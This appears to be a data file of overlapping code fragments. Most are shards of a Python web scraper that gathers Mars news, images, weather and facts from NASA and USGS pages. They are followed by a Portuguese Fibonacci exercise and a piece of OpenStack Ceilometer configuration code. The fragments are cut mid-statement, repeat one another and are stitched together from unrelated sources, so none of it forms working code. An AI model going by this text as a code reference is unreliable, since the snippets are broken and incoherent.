'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent", "mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url", "= soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = []", "'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url +", "= pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table", "BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the", "the step above for each hemisphere img_urls =[] titles=[] for i in range(4):", "img_link = base_url + img_search[0]['src'] img_link #do all of the step above for", "image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click()", "mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup =", "to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after", "dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click", "user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html", "'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more", "'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data", "def scrape(): import pandas as pd from splinter import Browser from bs4 import", "at the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link =", "full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url =", "+ img_search[0]['src'] img_link #do all of the step above for each hemisphere img_urls", "class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p", "soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/'", "search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text", "= title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2)", "= f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup", "html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search =", "'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_=", "soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div',", "BeautifulSoup import time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser", "img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2)", "featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html", "Browser from bs4 import BeautifulSoup import time #dictionary with all data mars_data={} executable_path", "#click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html", "x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search", "full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more", "in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click", "coding: utf-8 def scrape(): import pandas as pd from splinter import Browser from", "browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text", "= browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title img_search =", ") title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to get", "get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again", "soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split('", "time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome',", "10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html,", "step above for each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url)", "rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do", "mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the", "search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title", "browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')", "module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title =", "with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html", "= Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1", "had the word 'enhanced' at the end, just getting rid of that '", "# coding: utf-8 def scrape(): import pandas as pd from splinter import Browser", "soup = BeautifulSoup(html, 'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image' )", "p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to", "facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table =", "from splinter import Browser from bs4 import BeautifulSoup import time #dictionary with all", "from bs4 import BeautifulSoup import time #dictionary with all data mars_data={} executable_path =", "img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at", "for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup =", "#!/usr/bin/env python # coding: utf-8 def scrape(): import pandas as pd from splinter", "#click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info", "+ img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i in range(4):", "= search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary", "news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'", "featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "= [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls", "BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html", "html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather", "button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse", "image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url)", "base_url + img_search[0]['src'] img_link #do all of the step above for each hemisphere", "tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html", "mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/'", "the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button", "##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html", "'html.parser') #click the image link to get to the page with the full", "mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full", "the image link to get to the page with the full res image", "mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html", "'.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for", "browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to", "hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={}", "browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to get to the", "url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search =", "= 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section',", "twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search", "hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html", "'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64;", "html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module", "= 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "of the step above for each hemisphere img_urls =[] titles=[] for i in", "getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link", "facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''})", "import Browser from bs4 import BeautifulSoup import time #dictionary with all data mars_data={}", "BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_=", "headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1)", "#find the link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url =", "image link to get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click()", "title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html", "link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url", "image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html soup =", "image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had", "= browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the full size", "browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search", "and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word", "= {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT", "utf-8 def scrape(): import pandas as pd from splinter import Browser from bs4", "img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i in", "= BeautifulSoup(html, 'html.parser') #find the link to the full size image img_partial =", "Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 =", "#parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link", "word 'enhanced' at the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1])", "button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser')", "'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html", "img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src'])", "browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' )", "pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table =", "just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src']", "BeautifulSoup(html, 'html.parser') #click the image link to get to the page with the", "= {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left')", "urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls hemisphere_image_urls return", "browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table =", "pd from splinter import Browser from bs4 import BeautifulSoup import time #dictionary with", "again after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image", "search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search", "#click the image link to get to the page with the full res", "mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True)", "click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the", "click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find", "titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup", "hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html,", "browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search =", "browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image'", "pandas as pd from splinter import Browser from bs4 import BeautifulSoup import time", "browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table =", "link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the", "= BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1]))", "the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to", "with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True,", "= p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html", "browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html soup = BeautifulSoup(html,", "=[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html", "={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls hemisphere_image_urls return mars_data", "NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup =", "class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add", "#titles had the word 'enhanced' at the end, just getting rid of that", "(Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup", "bs4 import BeautifulSoup import time #dictionary with all data mars_data={} executable_path = {'executable_path':", "page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the", "import time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser =", "= browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click()", "= browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table", "titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={}", "link to get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get", "splinter import Browser from bs4 import BeautifulSoup import time #dictionary with all data", "BeautifulSoup(html, 'html.parser') #find the link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src']", "for each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click()", "[] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls hemisphere_image_urls", "img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i]", "page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title", "= 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html =" ]
[ "while n <= test: f.append(f[n] + f[n+1]) n += 1 print('O número da", "= int(input('Digite a posição desejada para saber o número de Fibonacci: ')) while", "<filename>python/exercicios_avaliativos/cap_3/fibonacci.py f = [] f.append(1) f.append(1) n = 0 test = int(input('Digite a", "número de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n +=", "n += 1 print('O número da posição {} é: {} na sequência de", "de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n += 1", "f.append(f[n] + f[n+1]) n += 1 print('O número da posição {} é: {}", "= 0 test = int(input('Digite a posição desejada para saber o número de", "<= test: f.append(f[n] + f[n+1]) n += 1 print('O número da posição {}", "= [] f.append(1) f.append(1) n = 0 test = int(input('Digite a posição desejada", "saber o número de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1])", "Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n += 1 print('O", "f = [] f.append(1) f.append(1) n = 0 test = int(input('Digite a posição", "f.append(1) f.append(1) n = 0 test = int(input('Digite a posição desejada para saber", "0 test = int(input('Digite a posição desejada para saber o número de Fibonacci:", "o número de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n", "f.append(1) n = 0 test = int(input('Digite a posição desejada para saber o", "1 print('O número da posição {} é: {} na sequência de Fibonacci!'.format(n-1, f[n-2]))", "test: f.append(f[n] + f[n+1]) n += 1 print('O número da posição {} é:", "+= 1 print('O número da posição {} é: {} na sequência de Fibonacci!'.format(n-1,", "[] f.append(1) f.append(1) n = 0 test = int(input('Digite a posição desejada para", "para saber o número de Fibonacci: ')) while n <= test: f.append(f[n] +", "+ f[n+1]) n += 1 print('O número da posição {} é: {} na", "a posição desejada para saber o número de Fibonacci: ')) while n <=", "test = int(input('Digite a posição desejada para saber o número de Fibonacci: '))", "n = 0 test = int(input('Digite a posição desejada para saber o número", "')) while n <= test: f.append(f[n] + f[n+1]) n += 1 print('O número", "n <= test: f.append(f[n] + f[n+1]) n += 1 print('O número da posição", "posição desejada para saber o número de Fibonacci: ')) while n <= test:", "f[n+1]) n += 1 print('O número da posição {} é: {} na sequência", "int(input('Digite a posição desejada para saber o número de Fibonacci: ')) while n", "desejada para saber o número de Fibonacci: ')) while n <= test: f.append(f[n]" ]
[ "Search class Package(Soft): ID = 'python' def _prepare(self): data = self.data links =", "= 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch =", "'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch = Search(links=links,", "= 'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'}", "_prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/'", "{'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)')", "mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self): data = self.data", "ID = 'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit':", "Package(Soft): ID = 'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe',", "self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url,", "mpkg.common import Soft from mpkg.utils import Search class Package(Soft): ID = 'python' def", "links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest:", "from mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self): data =", "= self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver =", "'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog", "'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url", "class Package(Soft): ID = 'python' def _prepare(self): data = self.data links = {'32bit':", "from mpkg.common import Soft from mpkg.utils import Search class Package(Soft): ID = 'python'", "data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch = Search(links=links, ver=data.ver)", "Soft from mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self): data", "= {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python", "import Search class Package(Soft): ID = 'python' def _prepare(self): data = self.data links", "url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch", "import Soft from mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self):", "'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog'", "def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url =", "'64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog =", "data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver" ]
[ "ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options #", "discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS,", "Unless required by applicable law or agreed to in writing, software # distributed", "a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for", "import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import", "Apache License, Version 2.0 (the \"License\"); you may # not use this file", "ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery", "ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification',", "the License. You may obtain # a copy of the License at #", "may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 